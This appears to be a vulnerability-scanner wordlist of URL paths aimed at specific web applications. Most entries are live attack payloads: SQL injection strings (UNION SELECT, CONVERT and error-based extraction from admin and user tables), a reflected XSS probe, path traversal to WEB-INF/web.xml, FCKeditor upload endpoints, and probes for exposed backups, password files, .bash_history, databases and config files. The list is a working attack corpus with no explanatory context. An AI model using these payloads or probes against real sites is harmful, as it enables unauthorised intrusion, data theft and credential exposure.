/FWeb/WorkRoomWeb/Web/TeacherSource.aspx?tid=-1%20AND%201=(SELECT%20CHAR(106)%2bCHAR(67))%20--
/FWeb/SPEWeb/Web5/SPEVideosDetail.aspx?KindSetID=30000&VideoID=105%20and%201=(SELECT%20CHAR(86)%2bCHAR(105))
/FWeb/WorkRoomWeb/Web/TeacherCourse.aspx?tid=101%20AND%201=(SELECT%20CHAR(89)%2bCHAR(105))--
/FWeb/WorkRoomWeb/Web/TeacherBlog.aspx?tid=101%20AND%201=(SELECT%20CHAR(89)%2bCHAR(105))--
/FWeb/WorkRoomWeb/Web/TeacherBlogDetail.aspx?tid=101%20AND%201=(SELECT%20CHAR(106)%2bCHAR(79))&diaryID=1
/VIEWGOOD/ADI/portal/UserDataSync.aspx
/SPM/Pc/Content/Request.aspx?action=name_check
/VIEWGOOD/ADI/portal/GetCaption.ashx?CaptionType=1'%20AND%20(SELECT%20CHAR(86))%3E0--&AssetID=1&CaptionName=1
/adksvod/PublicFolder/AuthorVideo.aspx?AuthorID=-4448%20UNION%20ALL%20SELECT%20CHAR%2858%29%2bCHAR%28112%29%2bCHAR%28112%29%2bCHAR%28112%29%2bCHAR%2858%29%2bCHAR%2886%29%2bCHAR%2858%29%2bCHAR%28113%29%2bCHAR%28113%29%2bCHAR%2858%29--%20
/App_Site/SiteSearch.aspx?Title=1'%20AND%20(SELECT%20CHAR(58)%2bCHAR(85))%3E1%20--
/adksvod/PublicFolder/ShareVideoList.aspx?TagID=-1406%25%27%20UNION%20ALL%20SELECT%20CHAR%2858%29%2bCHAR%28112%29%2bCHAR%28112%29%2bCHAR%28112%29%2bCHAR%2858%29%2bCHAR%2886%29%2bCHAR%2858%29%2bCHAR%28113%29%2bCHAR%28113%29%2bCHAR%28113%29%2bCHAR%2858%29--%20
/adksvod/PublicFolder/VideoList.aspx?userid=1&TagID=101%25%27%20AND%202358%3DCONVERT%28INT%2C%28CHAR%2858%29%2bCHAR%28112%29%2bCHAR%28112%29%2bCHAR%28112%29%2bCHAR%2858%29%2bCHAR%2886%29%2bCHAR%2858%29%2bCHAR%28113%29%2bCHAR%28113%29%2bCHAR%28113%29%2bCHAR%2858%29%29%29%20--&type=catalog&level=3
/ismservice/jsp/billQueryPage.jsp?entercode=3%22%3C/script%3E%3Cscript%3Eprompt(42873);%3C/script%3E//
/admin/include/del.asp?tableName=feedback&pk=id&pkValue=IIF(iamnotfunction(),1,0)
/include/upload.asp
/TownsWeb/PageModule/MessageInfoList.aspx?MediaID=1'%20AND%201=CHAR(108)%20--
/TownsWeb/PageModule/MessageInfoSender.aspx?msgID=1'%20AND%201=CHAR(107)%20--
/Duty/write/FileType.aspx?hideBtn=1&ID=1'%20and%201=char(86)%20--
/WarnMaintence/AJaxHandler/UpdateSortNo.ashx?fnName=1&DeptCd=1&SortNo=(select%20char(86)%2bchar(95))
/WarnMaintence/SelectContacts.aspx?fnName=UpdateContact&selectedNodes=1&contactDeptCD=(select%20char(88)%2bchar(95))
/Warn/AjaxHandle/AjaxDeleteMsgInfo.ashx?action=DeleteMsg&msgid=(CONVERT(INT,(SELECT%20CHAR(99)%2bCHAR(86)%2bCHAR(94)%2bCHAR(101)%2bCHAR(93))))
/Map/AjaxHandler/AjaxMapCustomAction.ashx?action=GetParamVal&param=FaxUrl'%20and%202=(select%20char(118))%20--&dateForAjax=417
/products.asp
/App_Site/SiteTag.aspx?Tag=1'%20and%20char(106)=1%20--
/product_view.asp
/system/database/data.mdb
/fckeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=FileUpload&Type=File&CurrentFolder=/
/manage/CHKLOGIN.ASP
/Web/Interface/Pages/Frame_StudentBlog.aspx?i_rang=1%20and%201=(select%20char(96)%2bchar(98))&asid=321001
/Web/Interface/Pages/Frame_StudentBlog.aspx?i_rang=1&asid=1001%20and%201=(select%20char(76)%2bchar(98))
/search.asp
/onlineApply.do?method=initQlxm&depNo=321'%20AND%201122=(SELECT%20UPPER(XMLType(chr(60)%7C%7Cchr(101)%7C%7Cchr(98)%7C%7Cchr(115)%7C%7Cchr(99)%7C%7Cchr(97)%7C%7Cchr(110)%7C%7Cchr(58)%7C%7Cchr(105)%7C%7Cchr(58)%7C%7Cchr(102)%7C%7Cchr(105)%7C%7Cchr(110)%7C%7Cchr(100)))%20FROM%20DUAL)%20AND%20'FrOd'='FrOd
/Report/AjaxHandle/StationChoose/StationSearch.ashx?stationName=21')%20and%203=char(109)%20--&stationType='KKK','ZZ','PP','RR'&StationChooseType=Single&ReportID=Report16
/db1/%23kepu.mdb
/upfile.asp
/upfile2.asp
/upfile3.asp
/data/xinfang.mdb
/VIEWGOOD/WebMedia/search.aspx?key=0&searchCondition=1')%20AND%201=(SELECT%20CHAR(106))%20--&rnd=0.85
/gwxxbviewhtml.do?theAction=downdoc&htwj_recordid=../../WEB-INF/web.xml%00&gw_title=%00
/Duty/MailList/ContactUpdate.aspx?ReadOnly=&UnitID=1&ContactID=-1+and+1=(SELECT%20CHAR(106))
/WS/WebServiceBase.asmx/GetXMLList
/WS/WebService.asmx/GetFile
/WS/WebService.asmx/GetFileContent
/WS/WebService.asmx
/bos/desktop/ajax/EcAjax.aspx
/bos/desktop/RequestOrResponse.aspx?type=hits&isHits=Y&contentUid=%27%2b+(select+convert(int%2c(CHAR(106)%2bCHAR(79)))+FROM+syscolumns)+%2b%27
/Factory/AjaxGetCSDM.aspx?CSDM=TEST'%20AND%201=CHAR(106)%20--&a=1.1
/ldhyhd.do?theAction=edit_bzOne&id=1'%20UNION%20ALL%20SELECT%20NULL,CHR(113)%7C%7CCHR(120)%7C%7CCHR(105)%7C%7CCHR(113)%7C%7CCHR(113)%7C%7CCHR(115)%7C%7CCHR(78)%7C%7CCHR(65)%7C%7CCHR(108)%7C%7CCHR(70)%7C%7CCHR(71)%7C%7CCHR(103)%7C%7CCHR(98)%7C%7CCHR(120)%7C%7CCHR(75)%7C%7CCHR(113)%7C%7CCHR(114)%7C%7CCHR(109)%7C%7CCHR(108)%7C%7CCHR(113),NULL,NULL,NULL,NULL,NULL%20FROM%20DUAL--
/model/twogradepage/listSend.aspx?appid=1%20AND%20CHAR(106)=1
/interface/ipsconnect/ipsconnect.php
/templates/
/service/local/outreach/welcome/nexusSpaces.css
/phpRedisAdmin/?overview
/?overview
/index.html#/dashboard/file/logstash.json
/index.php/weblinks-categories?id=just_test
/index.php/admin/?case=archive&act=respond&code=alipay&trade_status=WAIT_SELLER_SEND_GOODS
/index.php?m=Article&a=showByUname&uname=%2527or%25201%253D%2528select%25201%2520from%2520%2528select%2520count%2528%252a%2529%252Cconcat%2528floor%2528rand%25280%2529%252a2%2529%252C%2528select%2520md5%25281122%2529%2520from%2520fanwe_admin%2520limit%25200%252C1%2529%2529a%2520from%2520information_schema.tables%2520group%2520by%2520a%2529b%2529%2523
/FCKeditor/editor/filemanager/upload/php/upload.php?Type=Media
/index.php?c=api&a=down&file=YWQ2OVpRcGJtL3d3NWh5WmVxbkNYbGRnZjVnalFLSXRaWkRpT1dVZmNXQ1BqNjhPeE82RkpKak1iWUZwcDZrK2tXaFZYdTRZ
/share.php?F_email=test@vul.org%27+and+(select+1+from(select+count(*),concat(0x7c,(select+(Select+concat(0x7e,md5(1122),0x7e)+from+user+limit+0,1)),0x7c,floor(rand(0)*2))x+from+information_schema.tables+group+by+x+limit+0,1)a)%23/test
/oxoxoxoxoxoxox.com
/oxoxoxoxoxoxox.com/
/api/xmlrpc
/wwwroot.rar
/wwwroot.zip
/wwwroot.tar.gz
/web.rar
/www.rar
/www.zip
/www.tar.gz
/web.zip
/crossdomain.xml
/webscan_test.txt
/phpinfo.php
/info.php
/test.php
/shop.php?ac=view&shopid=1-cfreer
/wp-includes/registration-functions.php
/wp-includes/registration.php
/NOEXICT.php?A%27+and+(select+1+from(select+count(*),concat(0x7c,(select+(Select+concat(0x7e,md5(1122),0x7e)+from+user+limit+0,1)),0x7c,floor(rand(0)*2))x+from+information_schema.tables+group+by+x+limit+0,1)a)%23
/pass.txt
/passwd
/password.txt
/passwords.txt
/users.txt
/users.ini
/admin.cfg
/install.log
/database.inc
/common.inc
/db.inc
/connect.inc
/conn.inc
/sql.inc
/.bash_history
/.bashrc
/Web.config
/Global.asax
/Global.asa
/Global.asax.cs
/data.mdb
/domcfg.nsf
/names.nsf
/log.nsf
/domlog.nsf
/.rediscli_history
/data/%23data.mdb
/config.inc.php.bak
/config/config_ucenter.php.bak
/config/config_global.php.bak
/uc_server/data/config.inc.php.bak
/data/common.inc.php.bak
/wp-config.php.bak
/WEB-INF/database.properties